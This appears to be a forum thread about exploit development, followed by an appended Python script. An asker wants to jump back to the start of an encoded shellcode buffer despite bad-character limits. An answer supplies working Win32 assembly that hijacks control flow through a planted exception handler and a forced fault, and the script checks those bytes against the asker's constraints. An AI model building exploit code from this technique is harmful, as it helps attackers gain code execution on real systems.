Reputation: 11
Update: Since I'm able to get the correct address into a register that I want to jump/call to, I think the best option would be to figure out a way to have self modifying code result in a jmp/call register. Ex. FFD6 call esi Would anyone be able to give me some pointers or an example in assembly of how to get a resulting FFD6?
I'm messing around with an exploit, and having a hard time moving backwards in the stack due to bad characters. I need to move back ~460 bytes to get to the start of my buffer.
Here is a list of the bad characters:
\x0a\x0d\x1a\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e\x8f\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff
I'm limited to x86/alpha_mixed with a couple of exceptions like \x81 and \x8d. The only way I've been able to move back in the stack is \x74\x81 (which are allowed characters), but I'd have to do that 4 times to get back the ~460 bytes. That wouldn't be the biggest deal, except that it will also make it very difficult for me to segment my shellcode when I'm already having to encode it to alpha_mixed.
I'm not an assembly master, so is there any other way that I'm missing that I might be able to move directly back without jmp or call (FF)?
Upvotes: 0
Views: 711
Reputation: 29012
I have a working solution, but it's for Windows only and is based on a few other assumptions.
It's not totally optimized, I guess there are better ways to do parts of this...
; ASSUMPTIONS:
; Platform is Win32
; ESI contains address to be jumped to
; All characters except for 00 and the ones you listed above are allowed
; The contents of the registers after the jump don't matter
; BASIC METHOD:
; 1) Set up a structured exception handler pointing to your target address
; 2) Cause an exception
; Get zero into EAX and EDX
00401000 B8 11111111 MOV EAX, 11111111
00401005 35 11111111 XOR EAX, 11111111
0040100A 50 PUSH EAX
0040100B 5A POP EDX
; First part of the SEH: Push target address
0040100C 56 PUSH ESI
; Second part of the SEH: Read FS:[0] and push it
0040100D 64:0310 ADD EDX, FS:[EAX]
00401010 52 PUSH EDX
; Get zero into EDX again
00401011 50 PUSH EAX
00401012 5A POP EDX
; Write new SEH pointer into FS:[0]
00401013 64:2110 AND FS:[EAX], EDX
00401016 64:0120 ADD FS:[EAX], ESP
; Trigger exception (writing to memory at address zero)
00401019 0110 ADD [EAX], EDX
Upvotes: 2
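The answer above claims its byte sequence avoids both 0x00 and every byte in the question's list, while resting on a looser assumption than the asker's alpha_mixed restriction. The following Python script is an added check, not code from either poster: it parses the question's bad-character list (tolerating the missing backslash before xf8), transcribes the opcode bytes from the answer's listing, verifies that none of them is forbidden, and reports which bytes fall outside the printable alphanumeric range, so the reader can see exactly where the answer depends on its "everything except 00 and your list is allowed" assumption. The `ALPHANUMERIC` set and the helper names are this example's own.

```python
import re

# Bad-character list as posted in the question (constructed copy; the
# original has "xf8" without a backslash, which the parser below accepts).
QUESTION_BAD_CHARS = (
    r"\x0a\x0d\x1a\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e\x8f"
    r"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f"
    r"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf"
    r"\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
    r"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef"
    r"\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)

# Opcode bytes transcribed from the answer's listing, instruction by instruction.
ANSWER_BYTES = bytes.fromhex(
    "B8 11111111"  # MOV EAX, 11111111
    "35 11111111"  # XOR EAX, 11111111   -> EAX = 0
    "50"           # PUSH EAX
    "5A"           # POP EDX             -> EDX = 0
    "56"           # PUSH ESI            (handler = target address)
    "64 03 10"     # ADD EDX, FS:[EAX]   -> EDX = current SEH head
    "52"           # PUSH EDX            (next pointer)
    "50"           # PUSH EAX
    "5A"           # POP EDX             -> EDX = 0
    "64 21 10"     # AND FS:[EAX], EDX   -> FS:[0] = 0
    "64 01 20"     # ADD FS:[EAX], ESP   -> FS:[0] = ESP (new record)
    "01 10"        # ADD [EAX], EDX      -> write to address 0, fault
)

# Printable alphanumeric ASCII: '0'-'9', 'A'-'Z', 'a'-'z' (assumed to be what
# the asker's alpha_mixed restriction permits, before the stated exceptions).
ALPHANUMERIC = (
    set(range(0x30, 0x3A)) | set(range(0x41, 0x5B)) | set(range(0x61, 0x7B))
)


def parse_bad_chars(text: str) -> set[int]:
    """Parse a \\xNN list into byte values; a missing backslash is tolerated."""
    return {int(h, 16) for h in re.findall(r"\\?x([0-9a-fA-F]{2})", text)}


def offending_bytes(code: bytes, bad: set[int]) -> list[tuple[int, int]]:
    """Return (offset, value) for every byte that is 0x00 or in the bad set."""
    return [(i, b) for i, b in enumerate(code) if b == 0 or b in bad]


def non_alphanumeric_bytes(code: bytes) -> list[int]:
    """Distinct byte values in `code` that lie outside printable alphanumerics."""
    return sorted({b for b in code if b not in ALPHANUMERIC})


def check_answer() -> dict:
    """Summarise how the answer's bytes relate to both posters' constraints."""
    bad = parse_bad_chars(QUESTION_BAD_CHARS)
    return {
        "length": len(ANSWER_BYTES),
        "bad_count": len(bad),
        "offending": offending_bytes(ANSWER_BYTES, bad),
        "non_alphanumeric": non_alphanumeric_bytes(ANSWER_BYTES),
    }


if __name__ == "__main__":
    report = check_answer()
    print(f"{report['length']} bytes, {report['bad_count']} forbidden values parsed")
    print("bytes hitting the question's list or 0x00:", report["offending"])
    print("bytes outside alphanumeric ASCII:",
          [f"{b:02X}" for b in report["non_alphanumeric"]])
```

Running it shows the answer's 27 bytes contain nothing from the question's list and no null, but seven distinct values (01, 03, 10, 11, 20, 21, B8) are not alphanumeric, which is exactly the gap between the answer's assumptions and the asker's encoder constraint.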